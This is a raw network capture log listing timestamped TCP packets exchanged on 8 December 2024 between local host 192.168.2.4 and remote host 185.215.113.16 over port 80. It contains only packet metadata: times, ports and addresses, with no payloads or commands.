Dec 8, 2024 19:52:38.394860029 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.395257950 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.395315886 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.397454977 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.397524118 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.397699118 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.397754908 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.400425911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.400492907 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.400605917 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.400665045 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.402740955 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.402816057 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.402829885 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.402875900 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.405495882 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.405546904 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.405702114 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.405750990 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.407531023 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.407581091 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.407715082 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.407764912 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.409992933 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.410043001 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.410270929 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.410320044 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.412511110 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.412563086 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.412600040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.412648916 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.415003061 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.415055037 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.415128946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.415179014 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.417525053 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.417574883 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.417673111 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.417726040 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.420352936 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.420408010 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.420438051 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.420486927 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.422949076 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.422997952 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.423084974 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.423135042 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.425283909 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.425332069 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.425491095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.425535917 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.427905083 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.427969933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.428015947 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.428067923 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.430547953 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.430644035 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.430644035 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.430680990 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.432830095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.432883024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.432884932 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.432924032 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.435307026 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.435369015 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.435566902 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.435617924 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.437901020 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.437954903 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.438021898 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.438071966 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.440387011 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.440444946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.440469980 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.440489054 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.442981958 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.443047047 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.443049908 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.443116903 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.445480108 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.445545912 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.445760965 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.445807934 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.448193073 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.448256969 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.448285103 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.448340893 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.450505972 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.450541019 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.450570107 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.450594902 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.453241110 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.453286886 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.453327894 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.453341007 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.455672979 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.455733061 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.455816031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.455863953 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.458158970 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.458214045 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.458328009 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.458372116 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.469284058 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.469327927 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.469352007 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.469362974 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.469381094 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.469391108 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.469399929 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.469404936 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.469420910 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.469425917 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.469438076 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.469449043 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.469460964 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.469480038 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.469542980 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.469583035 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.471170902 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.471223116 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.471304893 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.471358061 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.473700047 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.473748922 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.473896980 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.473947048 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.475898981 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.475950003 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.476130962 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.476178885 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.478548050 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.478600025 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.478642941 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.478692055 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.527618885 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.527677059 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.527712107 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.527784109 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.528469086 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.528521061 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.528547049 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.528594017 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.530280113 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.530332088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.530560970 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.530608892 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.532223940 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.532274008 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.547327995 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.547394991 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.547450066 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.547498941 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.547821045 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.547885895 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.547926903 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.547972918 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.549531937 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.549583912 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.549833059 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.549899101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.551589966 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.551634073 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.551651001 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.551690102 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.553011894 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.553062916 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.553097010 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.553145885 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.554646969 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.554660082 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.554701090 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.556265116 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.556319952 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.556394100 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.556441069 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.557777882 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.557831049 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.557864904 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.557925940 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.559309006 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.559328079 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.559365034 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.559380054 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.561067104 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.561119080 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.561147928 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.561225891 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.562556982 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.562611103 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.562648058 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.562695980 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.564007998 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.564053059 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.564220905 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.564273119 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.565789938 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.565841913 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.565861940 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.565907955 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.567173004 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.567229033 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.567323923 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.567387104 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.568895102 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.568944931 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.568979025 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.569039106 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.570549011 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.570595026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.570669889 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.570720911 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.571893930 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.571908951 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.571938038 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.571959972 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.573196888 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.573246002 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.573318958 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.573364019 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.574579000 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.574625015 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.574836969 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.574882984 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.575963020 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.576009035 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.576076031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.576118946 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.577543974 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.577593088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.577630997 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.577673912 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.578810930 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.578856945 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.578869104 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.578919888 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.580080032 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.580127001 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.580133915 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.580176115 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.581315994 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.581363916 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.581408024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.581454992 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.582732916 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.582814932 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.582819939 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.582866907 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.584225893 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.584289074 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.584321022 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.584363937 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.585686922 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.585750103 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.585844040 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.585886955 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.587291002 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.587347984 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.587367058 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.587405920 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.588710070 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.588751078 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.588808060 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.588848114 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.590157032 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.590224981 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.590259075 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.590303898 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.591943979 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.591979980 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.592012882 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.592034101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.593225956 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.593293905 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.593305111 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.593336105 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.594167948 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.594208002 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.594228029 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.594265938 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.595010996 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.595052958 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.595107079 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.595149040 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.595982075 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.596030951 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.596076012 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.596107960 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.596880913 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.596954107 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.597089052 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.597136021 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.597852945 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.597901106 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.597908974 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.597938061 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.598834991 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.598896027 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.598916054 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.598952055 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.599675894 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.599724054 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.599802971 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.599853992 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.600626945 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.600677013 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.600728989 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.600764990 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.601632118 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.601675034 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.601701021 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.601741076 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.602510929 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.602555990 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.602601051 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.602868080 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.603425980 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.603441954 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.603482008 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.603492975 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.604564905 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.604621887 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.604681969 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.604734898 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.605345964 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.605387926 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.605392933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.605422974 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.606162071 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.606209993 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.606300116 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.606348038 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.607172012 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.607214928 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.607259989 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.607393980 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.608186007 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.608232975 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.608267069 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.608306885 CET	49757	80	192.168.2.4	185.215.113.16
